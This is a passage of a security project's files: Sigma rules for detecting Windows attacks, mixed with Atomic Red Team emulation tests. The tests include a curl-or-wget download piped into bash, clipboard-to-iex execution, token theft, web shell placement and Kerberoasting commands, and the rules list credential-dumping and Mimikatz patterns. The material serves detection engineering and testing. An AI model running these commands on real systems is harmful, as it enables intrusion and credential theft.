2 | id: 21f17060-b282-4249-ade0-589ea3591558
3 | status: experimental
4 | description: Detects new registry key created by Ursnif malware.
5 | references:
6 | - https://blog.yoroi.company/research/ursnif-long-live-the-steganography/
7 | - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
8 | tags:
9 | - attack.execution
10 | - attack.t1112
11 | author: megan201296
12 | date: 2019/02/13
13 | logsource:
14 | product: windows
15 | service: sysmon
16 | detection:
17 | selection:
18 | EventID: 13
19 | TargetObject: '*\Software\AppDataLow\Software\Microsoft\\*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_bluekeep_poc_scanner.yml:
--------------------------------------------------------------------------------
1 | title: Scanner PoC for CVE-2019-0708 RDP RCE vuln
2 | id: 8400629e-79a9-4737-b387-5db940ab2367
3 | description: Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep
4 | references:
5 | - https://twitter.com/AdamTheAnalyst/status/1134394070045003776
6 | - https://github.com/zerosum0x0/CVE-2019-0708
7 | tags:
8 | - attack.lateral_movement
9 | - attack.t1210
10 | - car.2013-07-002
11 | author: Florian Roth (rule), Adam Bradbury (idea)
12 | date: 2019/06/02
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID: 4625
19 | AccountName: AAAAAAA
20 | condition: selection
21 | falsepositives:
22 | - Unlikely
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_tscon_localsystem.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious TSCON Start
2 | id: 9847f263-4a81-424f-970c-875dab15b79b
3 | status: experimental
4 | description: Detects a tscon.exe start as LOCAL SYSTEM
5 | references:
6 | - http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
7 | - https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
8 | author: Florian Roth
9 | date: 2018/03/17
10 | tags:
11 | - attack.command_and_control
12 | - attack.t1219
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | User: NT AUTHORITY\SYSTEM
19 | Image: '*\tscon.exe'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_msiexec_cwd.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious MsiExec Directory
2 | id: e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144
3 | status: experimental
4 | description: Detects suspicious msiexec process starts in an uncommon directory
5 | references:
6 | - https://twitter.com/200_okay_/status/1194765831911215104
7 | tags:
8 | - attack.defense_evasion
9 | - attack.t1036
10 | author: Florian Roth
11 | date: 2019/11/14
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\msiexec.exe'
18 | filter:
19 | Image:
20 | - 'C:\Windows\System32\\*'
21 | - 'C:\Windows\SysWOW64\\*'
22 | - 'C:\Windows\WinSxS\\*'
23 | condition: selection and not filter
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_prompt_credentials.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Credential Prompt
2 | id: ca8b77a9-d499-4095-b793-5d5f330d450e
3 | status: experimental
4 | description: Detects PowerShell calling a credential prompt
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/850381440629981184
7 | - https://t.co/ezOTGy1a1G
8 | tags:
9 | - attack.execution
10 | - attack.credential_access
11 | - attack.t1086
12 | author: John Lambert (idea), Florian Roth (rule)
13 | logsource:
14 | product: windows
15 | service: powershell
16 | definition: 'Script block logging must be enabled'
17 | detection:
18 | selection:
19 | EventID: 4104
20 | keyword:
21 | Message:
22 | - '*PromptForCredential*'
23 | condition: all of them
24 | falsepositives:
25 | - Unknown
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_bcdedit.yml:
--------------------------------------------------------------------------------
1 | title: Possible Ransomware or unauthorized MBR modifications
2 | id: c9fbe8e9-119d-40a6-9b59-dd58a5d84429
3 | status: experimental
4 | description: Detects, possibly, malicious unauthorized usage of bcdedit.exe
5 | references:
6 | - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set
7 | author: '@neu5ron'
8 | date: 2019/02/07
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1070
12 | - attack.persistence
13 | - attack.t1067
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | NewProcessName: '*\bcdedit.exe'
20 | ProcessCommandLine:
21 | - '*delete*'
22 | - '*deletevalue*'
23 | - '*import*'
24 | condition: selection
25 | level: medium
26 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1059.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1059
3 | display_name: Command-Line Interface
4 |
5 | atomic_tests:
6 | - name: Command-Line Interface
7 | description: |
8 | Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
9 |
10 | This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor:
19 | name: sh
20 | command: |
21 | bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
22 | bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1134.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1134
3 | display_name: Access Token Manipulation
4 |
5 | atomic_tests:
6 | - name: Access Token Manipulation
7 | description: |
8 | Creates a process as another user
9 | Requires Administrator Privileges To Execute Test
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | target_user:
14 | description: Username To Steal Token From
15 | type: String
16 | default: SYSTEM
17 | executor:
18 | name: powershell
19 | elevation_required: true
20 | command: |
21 | #list processes by user,
22 |
23 | $owners = @{}
24 | gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
25 | get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
26 | #Steal Token
27 | . .\src\T1134.ps1
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_netsh_fw_add.yml:
--------------------------------------------------------------------------------
1 | title: Netsh
2 | id: cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c
3 | description: Allow Incoming Connections by Port or Application on Windows Firewall
4 | references:
5 | - https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)
6 | - https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
7 | date: 2019/01/29
8 | tags:
9 | - attack.lateral_movement
10 | - attack.command_and_control
11 | - attack.t1090
12 | status: experimental
13 | author: Markus Neis
14 | logsource:
15 | category: process_creation
16 | product: windows
17 | detection:
18 | selection:
19 | CommandLine:
20 | - '*netsh firewall add*'
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administration
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1115.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1115
3 | display_name: Clipboard Data
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1115
5 |
6 | atomic_tests:
7 | - name: Utilize Clipboard to store or execute commands from
8 | description: |
9 | Add data to clipboard to copy off or execute commands from.
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | elevation_required: false
15 | command: |
16 | dir | clip
17 | clip < readme.txt
18 |
19 | - name: PowerShell
20 | description: |
21 | Utilize PowerShell to echo a command to clipboard and execute it
22 | supported_platforms:
23 | - windows
24 | executor:
25 | name: powershell
26 | elevation_required: false
27 | command: |
28 | echo Get-Process | clip
29 | Get-Clipboard | iex
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_impacket_secretdump.yml:
--------------------------------------------------------------------------------
1 | title: Possible Impacket SecretDump remote activity
2 | id: 252902e3-5830-4cf6-bf21-c22083dfd5cf
3 | description: Detect AD credential dumping using impacket secretdump HKTL
4 | author: Samir Bousseaden
5 | references:
6 | - https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
7 | tags:
8 | - attack.credential_access
9 | - attack.t1003
10 | logsource:
11 | product: windows
12 | service: security
13 | description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
14 | detection:
15 | selection:
16 | EventID: 5145
17 | ShareName: \\*\ADMIN$
18 | RelativeTargetName: 'SYSTEM32\\*.tmp'
19 | condition: selection
20 | falsepositives:
21 | - pentesting
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dhcp_config.yml:
--------------------------------------------------------------------------------
1 | title: DHCP Server Loaded the CallOut DLL
2 | id: 13fc89a9-971e-4ca6-b9dc-aa53a445bf40
3 | status: experimental
4 | description: This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded
5 | references:
6 | - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html
7 | - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx
8 | - https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx
9 | date: 2017/05/15
10 | author: Dimitrios Slamaris
11 | tags:
12 | - attack.defense_evasion
13 | - attack.t1073
14 | logsource:
15 | product: windows
16 | service: system
17 | detection:
18 | selection:
19 | EventID: 1033
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: critical
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_exe_calling_ps.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell called from an Executable Version Mismatch
2 | id: c70e019b-1479-4b65-b0cc-cd0c6093a599
3 | status: experimental
4 | description: Detects PowerShell called from an executable by the version mismatch method
5 | references:
6 | - https://adsecurity.org/?p=2921
7 | tags:
8 | - attack.defense_evasion
9 | - attack.execution
10 | - attack.t1086
11 | author: Sean Metcalf (source), Florian Roth (rule)
12 | logsource:
13 | product: windows
14 | service: powershell-classic
15 | detection:
16 | selection1:
17 | EventID: 400
18 | EngineVersion:
19 | - '2.*'
20 | - '4.*'
21 | - '5.*'
22 | HostVersion: '3.*'
23 | condition: selection1
24 | falsepositives:
25 | - Penetration Tests
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_malware_dridex.yml:
--------------------------------------------------------------------------------
1 | title: Dridex Process Pattern
2 | id: e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e
3 | status: experimental
4 | description: Detects typical Dridex process patterns
5 | references:
6 | - https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3
7 | author: Florian Roth
8 | date: 2019/01/10
9 | tags:
10 | - attack.defense_evasion
11 | - attack.privilege_escalation
12 | - attack.t1055
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection1:
18 | CommandLine: '*\svchost.exe C:\Users\\*\Desktop\\*'
19 | selection2:
20 | ParentImage: '*\svchost.exe*'
21 | CommandLine:
22 | - '*whoami.exe /all'
23 | - '*net.exe view'
24 | condition: 1 of them
25 | falsepositives:
26 | - Unlikely
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_rdp_localhost_login.yml:
--------------------------------------------------------------------------------
1 | title: RDP Login from localhost
2 | id: 51e33403-2a37-4d66-a574-1fda1782cc31
3 | description: RDP login with localhost source address may be a tunnelled login
4 | references:
5 | - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
6 | date: 2019/01/28
7 | modified: 2019/01/29
8 | tags:
9 | - attack.lateral_movement
10 | - attack.t1076
11 | - car.2013-07-002
12 | status: experimental
13 | author: Thomas Patzke
14 | logsource:
15 | product: windows
16 | service: security
17 | detection:
18 | selection:
19 | EventID: 4624
20 | LogonType: 10
21 | SourceNetworkAddress:
22 | - "::1"
23 | - "127.0.0.1"
24 | condition: selection
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_invocation_generic.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Invocations - Generic
2 | id: 3d304fda-78aa-43ed-975c-d740798a49c1
3 | status: experimental
4 | description: Detects suspicious PowerShell invocation command parameters
5 | tags:
6 | - attack.execution
7 | - attack.t1086
8 | author: Florian Roth (rule)
9 | logsource:
10 | product: windows
11 | service: powershell
12 | detection:
13 | encoded:
14 | - ' -enc '
15 | - ' -EncodedCommand '
16 | hidden:
17 | - ' -w hidden '
18 | - ' -window hidden '
19 | - ' - windowstyle hidden '
20 | noninteractive:
21 | - ' -noni '
22 | - ' -noninteractive '
23 | condition: all of them
24 | falsepositives:
25 | - Penetration tests
26 | - Very special / sneaky PowerShell scripts
27 | level: high
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_mal_wceaux_dll.yml:
--------------------------------------------------------------------------------
1 | title: WCE wceaux.dll Access
2 | id: 1de68c67-af5c-4097-9c85-fe5578e09e67
3 | status: experimental
4 | description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host
5 | author: Thomas Patzke
6 | references:
7 | - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
8 | - https://jpcertcc.github.io/ToolAnalysisResultSheet
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | - attack.s0005
13 | logsource:
14 | product: windows
15 | service: security
16 | detection:
17 | selection:
18 | EventID:
19 | - 4656
20 | - 4658
21 | - 4660
22 | - 4663
23 | ObjectName: '*\wceaux.dll'
24 | condition: selection
25 | falsepositives:
26 | - Penetration testing
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ping_hex_ip.yml:
--------------------------------------------------------------------------------
1 | title: Ping Hex IP
2 | id: 1a0d4aba-7668-4365-9ce4-6d79ab088dfd
3 | description: Detects a ping command that uses a hex encoded IP address
4 | references:
5 | - https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna
6 | - https://twitter.com/vysecurity/status/977198418354491392
7 | author: Florian Roth
8 | date: 2018/03/23
9 | tags:
10 | - attack.defense_evasion
11 | - attack.t1140
12 | - attack.t1027
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - '*\ping.exe 0x*'
20 | - '*\ping 0x*'
21 | condition: selection
22 | fields:
23 | - ParentCommandLine
24 | falsepositives:
25 | - Unlikely, because no sane admin pings IP addresses in a hexadecimal form
26 | level: high
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1100.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1100
3 | display_name: Web Shell
4 |
5 | atomic_tests:
6 | - name: Web Shell Written to Disk
7 | description: |
8 | This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
9 | Idea from APTSimulator.
10 | cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
11 |
12 | supported_platforms:
13 | - windows
14 | input_arguments:
15 | web_shell_path:
16 | description: The path to drop the web shell
17 | type: string
18 | default: C:\inetpub\wwwroot
19 | web_shells:
20 | description: Path of Web Shell
21 | type: path
22 | default: PathToAtomicsFolder\T1100\shells\
23 | executor:
24 | name: command_prompt
25 | command: |
26 | xcopy #{web_shells} #{web_shell_path}
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1124.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1124
3 | display_name: System Time Discovery
4 |
5 | atomic_tests:
6 | - name: System Time Discovery
7 | description: |
8 | Identify the system time
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | computer_name:
15 | description: computer name to query
16 | type: string
17 | default: localhost
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | net time \\#{computer_name}
24 | w32tm /tz
25 |
26 | - name: System Time Discovery - PowerShell
27 | description: |
28 | Identify the system time via PowerShell
29 |
30 | supported_platforms:
31 | - windows
32 |
33 | executor:
34 | name: powershell
35 | elevation_required: false
36 | command: |
37 | Get-Date
38 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_cmdkey_recon.yml:
--------------------------------------------------------------------------------
1 | title: Cmdkey Cached Credentials Recon
2 | id: 07f8bdc2-c9b3-472a-9817-5a670b872f53
3 | status: experimental
4 | description: Detects usage of cmdkey to look for cached credentials
5 | references:
6 | - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
7 | - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx
8 | author: jmallette
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | Image: '*\cmdkey.exe'
18 | CommandLine: '* /list *'
19 | condition: selection
20 | fields:
21 | - CommandLine
22 | - ParentCommandLine
23 | - User
24 | falsepositives:
25 | - Legitimate administrative tasks.
26 | level: low
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_svchost.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious Svchost Process
2 | id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d
3 | status: experimental
4 | description: Detects a suspicious svchost process start
5 | tags:
6 | - attack.defense_evasion
7 | - attack.t1036
8 | author: Florian Roth
9 | date: 2017/08/15
10 | logsource:
11 | category: process_creation
12 | product: windows
13 | detection:
14 | selection:
15 | Image: '*\svchost.exe'
16 | filter:
17 | ParentImage:
18 | - '*\services.exe'
19 | - '*\MsMpEng.exe'
20 | - '*\Mrt.exe'
21 | - '*\rpcnet.exe'
22 | filter_null:
23 | ParentImage: null
24 | condition: selection and not filter and not filter_null
25 | fields:
26 | - CommandLine
27 | - ParentCommandLine
28 | falsepositives:
29 | - Unknown
30 | level: high
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_usb_device_plugged.yml:
--------------------------------------------------------------------------------
1 | title: USB Device Plugged
2 | id: 1a4bd6e3-4c6e-405d-a9a3-53a116e341d4
3 | description: Detects plugged USB devices
4 | references:
5 | - https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/
6 | - https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/
7 | status: experimental
8 | author: Florian Roth
9 | tags:
10 | - attack.initial_access
11 | - attack.t1200
12 | logsource:
13 | product: windows
14 | service: driver-framework
15 | detection:
16 | selection:
17 | EventID:
18 | - 2003 # Loading drivers
19 | - 2100 # Pnp or power management
20 | - 2102 # Pnp or power management
21 | condition: selection
22 | falsepositives:
23 | - Legitimate administrative activity
24 | level: low
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1208.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1208
3 | display_name: Kerberoasting
4 |
5 | atomic_tests:
6 | - name: Request for service tickets
7 | description: |
8 | This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
9 |
10 | The following are further sources and credits for this attack:
11 | [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
12 | [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
13 |
14 | supported_platforms:
15 | - windows
16 |
17 | executor:
18 | name: powershell
19 | elevation_required: false
20 | command: |
21 | Import-Module .\Invoke-Kerberoast.ps1
22 | Invoke-Kerberoast | fl
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/sysmon_mimikatz_trough_winrm.yml:
--------------------------------------------------------------------------------
1 | title: Mimikatz through Windows Remote Management
2 | id: aa35a627-33fb-4d04-a165-d33b4afca3e8
3 | description: Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.
4 | references:
5 | - https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
6 | status: stable
7 | author: Patryk Prauze - ING Tech
8 | logsource:
9 | product: windows
10 | service: sysmon
11 | detection:
12 | selection:
13 | EventID: 10
14 | TargetImage: 'C:\windows\system32\lsass.exe'
15 | SourceImage: 'C:\Windows\system32\wsmprovhost.exe'
16 | condition: selection
17 | tags:
18 | - attack.credential_access
19 | - attack.execution
20 | - attack.t1003
21 | - attack.t1028
22 | - attack.s0005
23 | falsepositives:
24 | - low
25 | level: high
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_dnx.yml:
--------------------------------------------------------------------------------
1 | title: Application Whitelisting bypass via dnx.exe
2 | id: 81ebd28b-9607-4478-bf06-974ed9d53ed7
3 | status: experimental
4 | description: Execute C# code located in the consoleapp folder
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml
7 | - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/26
10 | modified: 2019/11/04
11 | tags:
12 | - attack.defense_evasion
13 | - attack.execution
14 | - attack.t1218
15 | level: medium
16 | logsource:
17 | category: process_creation
18 | product: windows
19 | detection:
20 | selection:
21 | Image|endswith: '\dnx.exe'
22 | condition: selection
23 | falsepositives:
24 | - Legitimate use of dnx.exe by legitimate user
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_interactive_logons.yml:
--------------------------------------------------------------------------------
1 | title: Interactive Logon to Server Systems
2 | id: 3ff152b2-1388-4984-9cd9-a323323fdadf
3 | description: Detects interactive console logons to
4 | author: Florian Roth
5 | tags:
6 | - attack.lateral_movement
7 | - attack.t1078
8 | logsource:
9 | product: windows
10 | service: security
11 | detection:
12 | selection:
13 | EventID:
14 | - 528
15 | - 529
16 | - 4624
17 | - 4625
18 | LogonType: 2
19 | ComputerName:
20 | - '%ServerSystems%'
21 | - '%DomainControllers%'
22 | filter:
23 | LogonProcessName: Advapi
24 | ComputerName: '%Workstations%'
25 | condition: selection and not filter
26 | falsepositives:
27 | - Administrative activity via KVM or ILO board
28 | level: medium
29 |
30 |
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_psr_capture_screenshots.yml:
--------------------------------------------------------------------------------
1 | title: psr.exe capture screenshots
2 | id: 2158f96f-43c2-43cb-952a-ab4580f32382
3 | status: experimental
4 | description: The psr.exe captures desktop screenshots and saves them on the local machine
5 | references:
6 | - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml
7 | - https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
8 | author: Beyu Denis, oscd.community
9 | date: 2019/10/12
10 | modified: 2019/11/04
11 | tags:
12 | - attack.persistence
13 | - attack.t1218
14 | level: medium
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | Image|endswith: '\Psr.exe'
21 | CommandLine|contains: '/start'
22 | condition: selection
23 | falsepositives:
24 | - Unknown
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_schtask_creation.yml:
--------------------------------------------------------------------------------
1 | title: Scheduled Task Creation
2 | id: 92626ddd-662c-49e3-ac59-f6535f12d189
3 | status: experimental
4 | description: Detects the creation of scheduled tasks in user session
5 | author: Florian Roth
6 | logsource:
7 | category: process_creation
8 | product: windows
9 | detection:
10 | selection:
11 | Image: '*\schtasks.exe'
12 | CommandLine: '* /create *'
13 | filter:
14 | User: NT AUTHORITY\SYSTEM
15 | condition: selection and not filter
16 | fields:
17 | - CommandLine
18 | - ParentCommandLine
19 | tags:
20 | - attack.execution
21 | - attack.persistence
22 | - attack.privilege_escalation
23 | - attack.t1053
24 | - attack.s0111
25 | - car.2013-08-001
26 | falsepositives:
27 | - Administrative activity
28 | - Software installation
29 | level: low
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_zxshell.yml:
--------------------------------------------------------------------------------
1 | title: ZxShell Malware
2 | id: f0b70adb-0075-43b0-9745-e82a1c608fcc
3 | description: Detects a ZxShell start by the called and well-known function name
4 | author: Florian Roth
5 | references:
6 | - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
7 | tags:
8 | - attack.g0001
9 | - attack.execution
10 | - attack.t1059
11 | - attack.defense_evasion
12 | - attack.t1085
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | Command:
19 | - 'rundll32.exe *,zxFunction*'
20 | - 'rundll32.exe *,RemoteDiskXXXXX'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - Unlikely
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/net_dns_c2_detection.yml:
--------------------------------------------------------------------------------
1 | title: Possible DNS Tunneling
2 | id: 1ec4b281-aa65-46a2-bdae-5fd830ed914e
3 | status: experimental
4 | description: Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain,
5 | which can be an indicator that DNS is used to transfer data.
6 | references:
7 | - https://zeltser.com/c2-dns-tunneling/
8 | - https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/
9 | author: Patrick Bareiss
10 | date: 2019/04/07
11 | logsource:
12 | product: dns
13 | detection:
14 | selection:
15 | parent_domain: '*'
16 | condition: selection | count(dns_query) by parent_domain > 1000
17 | falsepositives:
18 | - Valid software, which uses dns for transferring data
19 | level: high
20 | tags:
21 | - attack.t1043
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/powershell_suspicious_keywords.yml:
--------------------------------------------------------------------------------
1 | title: Suspicious PowerShell Keywords
2 | id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf
3 | status: experimental
4 | description: Detects keywords that could indicate the use of some PowerShell exploitation framework
5 | date: 2019/02/11
6 | author: Florian Roth
7 | references:
8 | - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462
9 | tags:
10 | - attack.execution
11 | - attack.t1086
12 | logsource:
13 | product: windows
14 | service: powershell
15 | definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277'
16 | detection:
17 | keywords:
18 | Message:
19 | - "*[System.Reflection.Assembly]::Load*"
20 | condition: keywords
21 | falsepositives:
22 | - Penetration tests
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_exploit_cve_2017_8759.yml:
--------------------------------------------------------------------------------
1 | title: Exploit for CVE-2017-8759
2 | id: fdd84c68-a1f6-47c9-9477-920584f94905
3 | description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
4 | references:
5 | - https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
6 | - https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
7 | tags:
8 | - attack.execution
9 | - attack.t1203
10 | author: Florian Roth
11 | date: 2017/09/15
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | ParentImage: '*\WINWORD.EXE'
18 | Image: '*\csc.exe'
19 | condition: selection
20 | falsepositives:
21 | - Unknown
22 | level: critical
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_iss_module_install.yml:
--------------------------------------------------------------------------------
1 | title: IIS Native-Code Module Command Line Installation
2 | id: 9465ddf4-f9e4-4ebd-8d98-702df3a93239
3 | description: Detects suspicious IIS native-code module installations via command line
4 | status: experimental
5 | references:
6 | - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/
7 | author: Florian Roth
8 | modified: 2012/12/11
9 | tags:
10 | - attack.persistence
11 | - attack.t1100
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '*\APPCMD.EXE install module /name:*'
19 | condition: selection
20 | falsepositives:
21 | - Unknown as it may vary from organisation to arganisation how admins use to install IIS modules
22 | level: medium
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_susp_ps_appdata.yml:
--------------------------------------------------------------------------------
1 | title: PowerShell Script Run in AppData
2 | id: ac175779-025a-4f12-98b0-acdaeb77ea85
3 | status: experimental
4 | description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
5 | references:
6 | - https://twitter.com/JohnLaTwC/status/1082851155481288706
7 | - https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03
8 | tags:
9 | - attack.execution
10 | - attack.t1086
11 | author: Florian Roth
12 | date: 2019/01/09
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine:
19 | - '* /c powershell*\AppData\Local\\*'
20 | - '* /c powershell*\AppData\Roaming\\*'
21 | condition: selection
22 | falsepositives:
23 | - Administrative scripts
24 | level: medium
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/win_spn_enum.yml:
--------------------------------------------------------------------------------
1 | title: Possible SPN Enumeration
2 | id: 1eeed653-dbc8-4187-ad0c-eeebb20e6599
3 | description: Detects Service Principal Name Enumeration used for Kerberoasting
4 | status: experimental
